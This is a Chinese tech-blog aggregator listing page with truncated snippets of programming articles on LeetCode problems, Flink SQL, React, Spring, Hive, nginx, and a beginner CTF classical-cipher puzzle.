  • 设计模式(建造型设计模式——抽象工厂模式) Rookie! 设计模式之建造型设计模式设计模式抽象工厂模式java
    设计模式(建造型设计模式——抽象工厂模式)抽象工厂模式定义抽象工厂模式提供一个接口,用户创建相关或者依赖对象的家族,而不需要明确指定具体类。抽象工厂允许客户端使用抽象的接口来创建一组相关的产品,而不需要关系实际产出的具体产品是什么,这样一来客户可以从具体的产品关系中解耦。模式结构AbstractFactory:抽象工厂。抽象工厂定义了一个接口,所有的具体工厂都必须实现此接口,这个接口包含了一组方法
  • leetcode颠倒二进制位 与遨游于天地 leetcode算法数据结构
    publicclassSolution{//youneedtreatnasanunsignedvaluepublicintreverseBits(intn){if(n==0)returnn;inti=-1,m=0;while(++i>1;}returnm;}}
  • 实验吧CTF密码学Writeup-古典密码Writeup syxvip
    古典密码分值:10来源:北邮天枢战队难度:易参与人数:6803人GetFlag:2507人答题人数:2791人解题通过率:90%密文内容如下{796785123677084697688798589686967847871657279728278707369787712573798465}请对其进行解密提示:1.加解密方法就在谜面中2.利用key值的固定结构格式:CTF{}密文全是数字,ascll码
  • 【大数据】Flink SQL 语法篇(五):Regular Join、Interval Join G皮T #FlinkSQL大数据flinksqlRegularJoinIntervalJoin双流Join
    《FlinkSQL语法篇》系列,共包含以下10篇文章:FlinkSQL语法篇(一):CREATEFlinkSQL语法篇(二):WITH、SELECT&WHERE、SELECTDISTINCTFlinkSQL语法篇(三):窗口聚合(TUMBLE、HOP、SESSION、CUMULATE)FlinkSQL语法篇(四):Group聚合、Over聚合FlinkSQL语法篇(五):RegularJoin、I
  • 悲观锁(Pessimistic Locking)是一种数据库锁定机制 TimeDoor 数据库并发数据库sql悲观锁数据库锁并发
    悲观锁(PessimisticLocking)是一种数据库锁定机制,用于防止多个事务同时修改同一数据记录。以下是关于悲观锁的一些详细信息:锁定数据:当事务对一条记录进行操作时,悲观锁会阻止其他事务对这条记录进行修改或删除。这通常是通过在数据库查询中使用诸如SELECTFORUPDATE这样的语句来实现的。当这条SQL语句执行时,数据库会对选定的记录加锁。事务性:悲观锁通常在事务的上下文中使用。只有
  • Python sorted()函数 尤鸟倦 Python学习python开发语言
    文章目录基本用法示例基础排序使用`reverse`参数使用`key`参数对字典进行排序高级用法注意事项sorted()是Python中的一个内置函数,用于对可迭代对象进行排序。这意味着它可以用来排序列表、元组、字典(基于键)以及其他可迭代的对象。sorted()函数返回一个新的、排序后的列表,原始输入对象不会被修改(即它是不可变的)。下面是一些关于sorted()函数的基本用法和高级特性的详细讲解
  • 深度学习pytorch——索引与切片 Echo-J AI深度学习pytorch人工智能
    indexingimporttorcha=torch.rand(4,3,28,28)#表示4张28*28的rgb图print(a[0].shape)#a[0]获得第一张图片print(a[0,0].shape)#a[0,0]获得第一张图片的r图print(a[0,0,2,4])#获得第一张图片第一个通道的一个像素点,因此得到的是一个标量selectfirst/lastN#selectfirst/l
  • 网页HTML5制作flex布局骰子,css3 flex布局结合transform生成一个3D骰子 weixin_39905500
    1Flex布局首先聊聊Flex布局,Flex布局又称“弹性布局”,任何容器都可以指定为Flex布局,设置Flex布局会使得子元素的float、clear、vertical-align失效1.1Flex属性1.1.1flex-direction:决定项目的排列方向,默认自左向右水平排列.box{flex-direction:row|row-reverse|column|column-reverse;
  • 【HTML/CSS】flex布局绘制骰子 CranberryPancake HTML/CSScssflex
    参考博文CSSflex弹性盒父级元素display:flex——子元素默认变成block,float失效flex-direction主轴方向row(默认)/row-reverse/column/column-reversejustify-content(沿着主轴方向):center/flex-start/flex-endalign-items(垂直主轴方向):center/flex-start/f
  • uniapp小程序上传oss Tanjc518 uni-app小程序
    uniapp上传小程序代码importcryptofrom'crypto-js';import{Base64}from'js-base64/base64.js';//计算oss签名。functioncomputeSignature(accessKeySecret,canonicalString){returncrypto.enc.Base64.stringify(crypto.HmacSHA1(c
  • delphi 计算文件与当前时间差(天小时分钟秒) 强哥83 Delphidelphiinteger
    procedureTForm1.FormCreate(Sender:TObject);//窗体初始化variFileHandle:Integer;FileTime:TDateTime;Days:Integer;Hours:Integer;Minutes:Integer;Seconds:Integer;beginDataPath:=ExtractFilePath(paramstr(0))+'data
  • python 使用 Crypto.PublicKey.RSA遇到的问题:from Crypto.PublicKey import RSA ModuleNotFoundError: No module ChenDuBr Errorpython
    fromCrypto.PublicKeyimportRSAModuleNotFoundError:Nomodulenamed‘Crypto’解决方法:(1)安装pycryptodome库:pipinstallpycryptodome如果site-packages中存在crypto、pycrypto,在pip之前,需要pipuninstallcrypto、pipuninstallpycrypto,否
  • PTA 实现单链表逆转 ZoeLandia 数据结构C链表数据结构算法
    本题要求实现一个函数,将给定的单链表逆转。函数接口定义:ListReverse(ListL);其中List结构定义如下:typedefstructNodePtrToNode;structNode{ElementTypeData;/存储结点数据/PtrToNodeNext;/指向下一个结点的指针/};typedefPtrToNodeList;/定义单链表类型*/L是给定单链表,函数Reverse要返
  • Leetcode 67. Add Binary SnailTyan
    文章作者:Tyan博客:noahsnail.com|CSDN|1.DescriptionAddBinary2.SolutionVersion1classSolution{public:stringaddBinary(stringa,stringb){reverse(a.begin(),a.end());reverse(b.begin(),b.end());intmin=0;intmax=0;int
  • Spring Boot 进阶系列(一)Hello World 项目 回文体文回
    文章使用版本为SpringBoot2.1.x对应入门系列SpringBoot入门系列(一)HelloWorldpom文件4.0.0org.schhx.springbootlearnspring-boot-helloworld0.0.1-SNAPSHOTjarspring-boot-helloworldDemoprojectforSpringBootorg.springframework.boots
  • C/C++ 字符串反转的几种方法 不知道叫什么好+1 C
    0.环境说明:windows7+VSCode+mingw321.使用库方法:reverse()/**功能:字符串反转*/#include#include#includeusingnamespacestd;intmain(void){stringstr="Hello,world!";reverse(str.begin(),str.end());cout#includeusingnamespacest
  • LeetCode206题:反转链表(python3) Zachos 银河骑士每日一练链表数据结构算法python
    采用递归classSolution:defreverseList(self,head:Optional[ListNode])->Optional[ListNode]:cur=headpre=Nonewhilecur:temp=cur.next#保存下一轮循环的节点cur.next=pre#将当前节点cur的指针指向上一个节点prepre=curcur=tempreturnpre
  • React 第七章 Hooks 静水流深,沧海一粟 reactreact.js前端前端框架
    Hooks基本介绍Hook是React16.8的新增特性。它可以让你在不编写class的情况下使用state以及其他的React特性。Hooks的出现,首先能解决如下的一些问题:告别令人疑惑的生命周期例如下面的例子,相同的代码在不同的生命周期中存在了两份importReactfrom"react";//类组件classAppextendsReact.Component{constructor(){
  • React中setState的异步与合并 要努力_ react.jsjavascript前端
    场景一importReactfrom'react';classMyAppextendsReact.Component{constructor(props){super(props);this.state={val:0}}componentDidMount(){this.setState({val:this.state.val+1})console.log(this.state.val)this.s
  • nginx反向代理原理讲解 sdly_熬夜冠军 渗透测试nginx反向代理
    一、概述反向代理(ReverseProxy)方式是指以代理服务器来接受Internet上的连接请求,然后将请求转发给内部网络上的服务器;并将从服务器上得到的结果返回给Internet上请求连接的客户端,此时代理服务器对外就表现为一个服务器。通常的代理服务器,只用于代理内部网络对Internet的连接请求,客户机必须指定代理服务器,并将本来要直接发送到Web服务器上的http请求发送到代理服务器中。
  • 210. 课程表 II(Java、DFS) 低调的骏马 算法深度优先java图论
    比起207题有向图环的检测,多了一个要求是将后序遍历的结果反转,即得到拓扑排序的结果//记录后序遍历结果Listpostorder=newArrayList[]buildGraph(intnumCourses,int[][]prerequisites)DFS遍历voidtraverse(List[]graph,ints)反转结果Collections.reverse(postorder);clas
  • 【大数据】Flink SQL 语法篇(七):Lookup Join、Array Expansion、Table Function G皮T #FlinkSQL大数据flinksqlLookupJoinArrayExpansionTableFunction维表Join
    《FlinkSQL语法篇》系列,共包含以下10篇文章:FlinkSQL语法篇(一):CREATEFlinkSQL语法篇(二):WITH、SELECT&WHERE、SELECTDISTINCTFlinkSQL语法篇(三):窗口聚合(TUMBLE、HOP、SESSION、CUMULATE)FlinkSQL语法篇(四):Group聚合、Over聚合FlinkSQL语法篇(五):RegularJoin、I
  • Sql 查询一张表中哪些字段做了外键跟哪些表关联了 三希 sql数据库
    要查询一张表中哪些字段做了外键以及它们与哪些表关联了,你可以使用SQL的系统表或信息模式(InformationSchema)来查询。以下是一个通用的方法,适用于大多数关系型数据库(如MySQL,PostgreSQL,SQLServer等):SELECTfk.table_nameAS'ChildTable',fk.column_nameAS'ForeignKeyColumn',ref.table_
  • mysql汇总 酸柠涛啊 mysql数据库
    一、多个模糊条件查询regexp1、group_concat连接distinct去重SEPARATOR’,‘逗号分割selectFIELD_NAME字段中文名,GROUP_CONCAT(DISTINCTFIELD_CODESEPARATOR‘,’)字段英文名fromda_dp_table_fieldwhereFIELD_NAMEregexp‘用户编码|客户编码’andDEL_FLAG=0group
  • 力扣151--反转字符串中的单词(优) 才艺のblog leetcode算法
    清晰易懂,简单高效!大体思路:每次截取到想要的单词,拼接到新的sb中,过程中伴随双指针进行空格位置指向控制,其中如果start指针如果==0的情况要放在第一个判断条件防止边界条件失效,并且这种情况下截取的是最后一个单词,此时不需要加额外空格。classSolution{  publicStringreverseWords(Strings){    s=s.trim();    StringBuil
  • jdk tomcat 环境变量配置 Array_06 javajdktomcat
    Win7 下如何配置java环境变量 1。准备jdk包,win7系统,tomcat安装包(均上网下载即可) 2。进行对jdk的安装,尽量为默认路径(但要记住啊!!以防以后配置用。。。) 3。分别配置高级环境变量。   电脑-->右击属性-->高级环境变量-->环境变量。 分别配置 : path    &nbs
  • Spring调SDK包报java.lang.NoSuchFieldError错误 bijian1013 javaspring
            在工作中调另一个系统的SDK包,出现如下java.lang.NoSuchFieldError错误。 org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.l
  • LeetCode[位运算] - #136 数组中的单一数 Cwind java题解位运算LeetCodeAlgorithm
    原题链接:#136 Single Number 要求: 给定一个整型数组,其中除了一个元素之外,每个元素都出现两次。找出这个元素 注意:算法的时间复杂度应为O(n),最好不使用额外的内存空间 难度:中等 分析: 题目限定了线性的时间复杂度,同时不使用额外的空间,即要求只遍历数组一遍得出结果。由于异或运算 n XOR n = 0, n XOR 0 = n,故将数组中的每个元素进
  • qq登陆界面开发 15700786134 qq
    今天我们来开发一个qq登陆界面,首先写一个界面程序,一个界面首先是一个Frame对象,即是一个窗体。然后在这个窗体上放置其他组件。代码如下: public class First {         public void initul(){        jf=ne
  • Linux的程序包管理器RPM 被触发 linux
    在早期我们使用源代码的方式来安装软件时,都需要先把源程序代码编译成可执行的二进制安装程序,然后进行安装。这就意味着每次安装软件都需要经过预处理-->编译-->汇编-->链接-->生成安装文件--> 安装,这个复杂而艰辛的过程。为简化安装步骤,便于广大用户的安装部署程序,程序提供商就在特定的系统上面编译好相关程序的安装文件并进行打包,提供给大家下载,我们只需要根据自己的
  • socket通信遇到EOFException 肆无忌惮_ EOFException
    java.io.EOFException at java.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2281) at java.io.ObjectInputStream$BlockDataInputStream.readShort(ObjectInputStream.java:
  • 基于spring的web项目定时操作 知了ing javaWeb
    废话不多说,直接上代码,很简单 配置一下项目启动就行 1,web.xml <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="h
  • 树形结构的数据库表Schema设计 矮蛋蛋 schema
    原文地址: http://blog.csdn.net/MONKEY_D_MENG/article/details/6647488     程序设计过程中,我们常常用树形结构来表征某些数据的关联关系,如企业上下级部门、栏目结构、商品分类等等,通常而言,这些树状结构需要借助于数据库完成持久化。然而目前的各种基于关系的数据库,都是以二维表的形式记录存储数据信息,
  • maven将jar包和源码一起打包到本地仓库 alleni123 maven
    http://stackoverflow.com/questions/4031987/how-to-upload-sources-to-local-maven-repository <project> ... <build> <plugins> <plugin> <groupI
  • java IO操作 与 File 获取文件或文件夹的大小,可读,等属性!!! 百合不是茶
    类 File File是指文件和目录路径名的抽象表示形式。 1,何为文件: 标准文件(txt doc mp3...) 目录文件(文件夹) 虚拟内存文件   2,File类中有可以创建文件的 createNewFile()方法,在创建新文件的时候需要try{} catch(){}因为可能会抛出异常;也有可以判断文件是否是一个标准文件的方法isFile();这些防抖都
  • Spring注入有继承关系的类(2) bijian1013 javaspring
    被注入类的父类有相应的属性,Spring可以直接注入相应的属性,如下所例:1.AClass类 package com.bijian.spring.test4; public class AClass { private String a; private String b; public String getA() { retu
  • 30岁转型期你能否成为成功人士 bijian1013 成长励志
            很多人由于年轻时走了弯路,到了30岁一事无成,这样的例子大有人在。但同样也有一些人,整个职业生涯都发展得很优秀,到了30岁已经成为职场的精英阶层。由于做猎头的原因,我们接触很多30岁左右的经理人,发现他们在职业发展道路上往往有很多致命的问题。在30岁之前,他们的职业生涯表现很优秀,但从30岁到40岁这一段,很多人
  • 【Velocity四】Velocity与Java互操作 bit1129 velocity
    Velocity出现的目的用于简化基于MVC的web应用开发,用于替代JSP标签技术,那么Velocity如何访问Java代码.本篇继续以Velocity三http://bit1129.iteye.com/blog/2106142中的例子为基础,      POJO    package com.tom.servlets; public
  • 【Hive十一】Hive数据倾斜优化 bit1129 hive
    什么是Hive数据倾斜问题   操作:join,group by,count distinct 现象:任务进度长时间维持在99%(或100%),查看任务监控页面,发现只有少量(1个或几个)reduce子任务未完成;查看未完成的子任务,可以看到本地读写数据量积累非常大,通常超过10GB可以认定为发生数据倾斜。 原因:key分布不均匀 倾斜度衡量:平均记录数超过50w且
  • 在nginx中集成lua脚本:添加自定义Http头,封IP等 ronin47 nginx lua csrf
    Lua是一个可以嵌入到Nginx配置文件中的动态脚本语言,从而可以在Nginx请求处理的任何阶段执行各种Lua代码。刚开始我们只是用Lua 把请求路由到后端服务器,但是它对我们架构的作用超出了我们的预期。下面就讲讲我们所做的工作。 强制搜索引擎只索引mixlr.com Google把子域名当作完全独立的网站,我们不希望爬虫抓取子域名的页面,降低我们的Page rank。 location /{
  • java-3.求子数组的最大和 bylijinnan java
    package beautyOfCoding; public class MaxSubArraySum { /** * 3.求子数组的最大和 题目描述: 输入一个整形数组,数组里有正数也有负数。 数组中连续的一个或多个整数组成一个子数组,每个子数组都有一个和。 求所有子数组的和的最大值。要求时间复杂度为O(n)。 例如输入的数组为1, -2, 3, 10, -4,
  • Netty源码学习-FileRegion bylijinnan javanetty
    今天看org.jboss.netty.example.http.file.HttpStaticFileServerHandler.java 可以直接往channel里面写入一个FileRegion对象,而不需要相应的encoder: //pipeline(没有诸如“FileRegionEncoder”的handler): public ChannelPipeline ge
  • 使用ZeroClipboard解决跨浏览器复制到剪贴板的问题 cngolon 跨浏览器复制到粘贴板Zero Clipboard
    Zero Clipboard的实现原理 Zero Clipboard 利用透明的Flash让其漂浮在复制按钮之上,这样其实点击的不是按钮而是 Flash ,这样将需要的内容传入Flash,再通过Flash的复制功能把传入的内容复制到剪贴板。 Zero Clipboard的安装方法 首先需要下载 Zero Clipboard的压缩包,解压后把文件夹中两个文件:ZeroClipboard.js
  • 单例模式 cuishikuan 单例模式
    第一种(懒汉,线程不安全): public class Singleton {   2     private static Singleton instance;   3     pri
  • spring+websocket的使用 dalan_123
    一、spring配置文件 <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans"    xmlns:xsi="http://www.w3.or
  • 细节问题:ZEROFILL的用法范围。 dcj3sjt126com mysql
    1、zerofill把月份中的一位数字比如1,2,3等加前导0 mysql> CREATE TABLE t1 (year YEAR(4), month INT(2) UNSIGNED ZEROFILL,    -> day
  • Android开发10——Activity的跳转与传值 dcj3sjt126com Android开发
    Activity跳转与传值,主要是通过Intent类,Intent的作用是激活组件和附带数据。   一、Activity跳转 方法一Intent intent = new Intent(A.this, B.class); startActivity(intent)   方法二Intent intent = new Intent();intent.setCla
  • jdbc 得到表结构、主键 eksliang jdbc 得到表结构、主键
    转自博客:http://blog.csdn.net/ocean1010/article/details/7266042 假设有个con DatabaseMetaData dbmd = con.getMetaData(); rs = dbmd.getColumns(con.getCatalog(), schema, tableName, null); rs.getSt
  • Android 应用程序开关GPS gqdy365 android
    要在应用程序中操作GPS开关需要权限: <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" /> 但在配置文件中添加此权限之后会报错,无法再eclipse里面正常编译,怎么办? 1、方法一:将项目放到Android源码中编译; 2、方法二:网上有人说cl
  • Windows上调试MapReduce zhiquanliu mapreduce
    1.下载hadoop2x-eclipse-plugin https://github.com/winghc/hadoop2x-eclipse-plugin.git 把 hadoop2.6.0-eclipse-plugin.jar 放到eclipse plugin 目录中。 2.下载 hadoop2.6_x64_.zip http://dl.iteye.com/topics/download/d2b
  • 如何看待一些知名博客推广软文的行为? justjavac 博客
    本文来自我在知乎上的一个回答:http://www.zhihu.com/question/23431810/answer/24588621 互联网上的两种典型心态: 当初求种像条狗,如今撸完嫌人丑 当初搜贴像条犬,如今读完嫌人软 你为啥感觉不舒服呢? 难道非得要作者把自己的劳动成果免费给你用,你才舒服? 就如同 Google 关闭了 Gooled Reader,那是
  • sql优化总结 macroli sql
    为了是自己对sql优化有更好的原则性,在这里做一下总结,个人原则如有不对请多多指教。谢谢!   要知道一个简单的sql语句执行效率,就要有查看方式,一遍更好的进行优化。   一、简单的统计语句执行时间 declare @d datetime ---定义一个datetime的变量set @d=getdate() ---获取查询语句开始前的时间select user_id
  • Linux Oracle中常遇到的一些问题及命令总结 超声波 oraclelinux
    1.linux更改主机名   (1)#hostname oracledb    临时修改主机名 (2) vi /etc/sysconfig/network   修改hostname (3) vi /etc/hosts        修改IP对应的主机名   2.linux重启oracle实例及监听的各种方法 (注意操作的顺序应该是先监听,后数据库实例) &nbs
  • hive函数大全及使用示例 superlxw1234 hadoophive函数
      具体说明及示例参 见附件文档。     文档目录:   目录 一、关系运算: 4 1. 等值比较: = 4 2. 不等值比较: <> 4 3. 小于比较: < 4 4. 小于等于比较: <= 4 5. 大于比较: > 5 6. 大于等于比较: >= 5 7. 空值判断: IS NULL 5
  • Spring 4.2新特性-使用@Order调整配置类加载顺序 wiselyman spring 4
    4.1 @Order Spring 4.2 利用@Order控制配置类的加载顺序 4.2 演示 两个演示bean package com.wisely.spring4_2.order; public class Demo1Service { } package com.wisely.spring4_2.order; public class
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他